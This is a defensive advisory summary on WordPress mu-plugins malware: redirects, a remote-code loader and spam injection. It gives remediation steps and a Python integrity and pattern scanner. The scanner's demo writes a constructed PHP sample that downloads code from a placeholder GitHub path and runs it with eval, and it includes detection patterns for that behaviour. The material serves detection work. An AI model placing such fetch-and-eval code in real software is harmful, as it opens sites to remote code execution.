Full Report
Threat actors are using the "mu-plugins" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory ("wp-content/mu-plugins") that are automatically executed by WordPress without the need to enable them explicitly via the
Analysis Summary
# Vulnerability: Malicious Code Injection via WordPress `mu-plugins` Directory
## CVE Details
- CVE ID: N/A (This summary is based on a threat report, not a formal CVE release. Security updates often predate CVE assignment.)
- CVSS Score: N/A
- CWE: CWE-94 (Improper Control of Generation of Code ('Code Injection')) - *Inferred based on arbitrary code execution/script replacement.*
## Affected Systems
- Products: WordPress Core Installations utilizing the `mu-plugins` functionality.
- Versions: All versions of WordPress where the `wp-content/mu-plugins` directory is writable and accessible to an attacker who has already achieved initial access to the site.
- Configurations: Sites where attackers have gained initial access allowing file upload or modification within the WordPress installation structure to place malicious PHP scripts in the `wp-content/mu-plugins` directory.
## Vulnerability Description
Threat actors are placing malicious PHP scripts within the `wp-content/mu-plugins/` (Must-Use Plugins) directory of WordPress sites. The report does not specify the initial access vector, but the technique presupposes a prior compromise that grants file write access. Because these plugins are automatically loaded by WordPress without requiring administrator enablement, they provide a persistent, stealthy backdoor.
Three primary malicious payloads discovered were:
1. **`redirect.php`**: Redirects site visitors to external malicious websites, sometimes masquerading as browser updates to trick users into installing further malware, including data-stealing payloads. It uses bot-detection logic to hide redirects from search engine crawlers.
2. **`index.php`**: Provides web shell-like functionality, allowing attackers to download and execute remote PHP scripts from external sources (e.g., GitHub) to maintain remote code execution.
3. **`custom-js-loader.php`**: Injects spam, hijacks outbound links to malicious sites, and replaces legitimate images on the site with explicit content, likely for SEO manipulation or phishing.
## Exploitation
- Status: Exploited in the wild (Reported actively being used by threat actors).
- Complexity: Depends on the initial access vector gained by the attacker, but placing the code in `mu-plugins` suggests persistence is easily achieved post-compromise.
- Attack Vector: Requires a prior compromise that provides file write access to the WordPress installation. Secondary attacks observed on these compromised sites include ClickFix-style lures leading to Lumma Stealer trojans.
## Impact
- Confidentiality: High (potential for configuration theft and data exfiltration by secondary malware deployed after initial access).
- Integrity: High (Arbitrary code execution, modification of site content/images, redirection of visitors).
- Availability: Medium (Site functionality can be disrupted by redirects and spam injections).
## Remediation
### Patches
There is no specific patch listed for a core WordPress vulnerability in this report, as the issue relates to an attacker utilizing a legitimate WordPress feature (`mu-plugins`) after gaining initial access. Remediation focuses on removing the malicious files and securing the initial entry point.
### Workarounds
1. **Immediate Deletion:** Immediately scan and delete any suspicious PHP files located in the `wp-content/mu-plugins/` directory, specifically looking for `redirect.php`, `index.php`, and `custom-js-loader.php` or any other unfamiliar files.
2. **Disable/Rename Directory (Temporary):** If an immediate cleanup is impossible, temporarily rename the `wp-content/mu-plugins` directory to prevent WordPress from loading any code within it.
3. **Secure Initial Access:** Trace back the initial infection vector (e.g., vulnerable plugins/themes, weak credentials) and secure it.
## Detection
- Indicators of Compromise:
* Unsolicited page redirects for legitimate visitors.
* Unexpected spam or explicit content appearing on site images.
* Unfamiliar PHP files in the `wp-content/mu-plugins/` directory.
* Evidence of remote code execution (especially scripts contacting external hosting like GitHub for payload delivery).
- Detection Methods and Tools:
* Use file integrity monitoring tools to track changes in the `/wp-content/mu-plugins/` folder.
* Review server access logs for unusual upload activity leading to the insertion of PHP files in this location.
* Run security scanners (such as Sucuri's) that specifically cover the `mu-plugins` directory structure.
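As an added example (not code from the Sucuri report), the following Python script implements the file integrity monitoring suggested above for `wp-content/mu-plugins`: it records a trusted baseline of SHA-256 hashes, reports files that are new, modified or removed, flags the filenames named in the report, and scans PHP files for the remote-fetch-and-execute pattern the report describes. The `demo()` scenario, the `site-helper.php` file and the GitHub path it uses are constructed for illustration only.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Filenames named in the Sucuri report; a match is only a hint (index.php can be legitimate).
REPORTED_NAMES = {"redirect.php", "index.php", "custom-js-loader.php"}
# Content heuristics for the behaviour the report describes: fetching and running remote PHP.
PATTERNS = {
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_init|fopen|include|require)(_once)?\s*\(?\s*['\"]https?://", re.I),
    "eval_call": re.compile(r"\beval\s*\(", re.I),
    "github_host": re.compile(r"raw\.githubusercontent\.com|github\.com", re.I),
}

def _sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def snapshot(mu_dir: str) -> dict:
    """Relative path -> SHA-256 for every file under mu-plugins; store this as the trusted baseline."""
    root = Path(mu_dir)
    return {str(p.relative_to(root)): _sha256(p) for p in sorted(root.rglob("*")) if p.is_file()}

def audit(mu_dir: str, baseline: dict) -> list:
    """Report files that are new, modified or removed vs. the baseline, plus risky PHP content."""
    findings, current = [], snapshot(mu_dir)
    for rel, digest in current.items():
        if rel not in baseline:
            findings.append((rel, "new_file"))
        elif baseline[rel] != digest:
            findings.append((rel, "modified"))
        if Path(rel).name.lower() in REPORTED_NAMES:
            findings.append((rel, "reported_name"))
        if rel.lower().endswith(".php"):
            text = (Path(mu_dir) / rel).read_text(errors="replace")
            findings += [(rel, label) for label, rx in PATTERNS.items() if rx.search(text)]
    findings += [(rel, "removed") for rel in baseline if rel not in current]
    return findings

def demo() -> list:
    """Constructed scenario: a clean baseline, then a dropped loader that matches the report's pattern."""
    mu = Path(tempfile.mkdtemp()) / "mu-plugins"
    mu.mkdir()
    (mu / "site-helper.php").write_text("<?php add_filter('the_content', 'trim');\n")  # constructed benign file
    baseline = snapshot(str(mu))
    # Constructed sample, not the real malware: mimics "fetch remote PHP from GitHub and run it".
    (mu / "index.php").write_text(
        "<?php $src = file_get_contents('https://raw.githubusercontent.com/EXAMPLE/upd/main/x.txt');\n"
        "eval($src);\n")
    return audit(str(mu), baseline)
```

In production, generate the baseline with `snapshot()` right after a verified clean install and run `audit()` on a schedule, alerting on any finding.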
## References
- Vendor Advisories: Sucuri Security Blog Analysis (URL defanged)
- Relevant Links:
* hXXps://blog.sucuri.net/2025/03/hidden-malware-strikes-again-mu-plugins-under-attack.html
* hXXps://github.com/starkvps99812/upd (Example host for fetched scripts)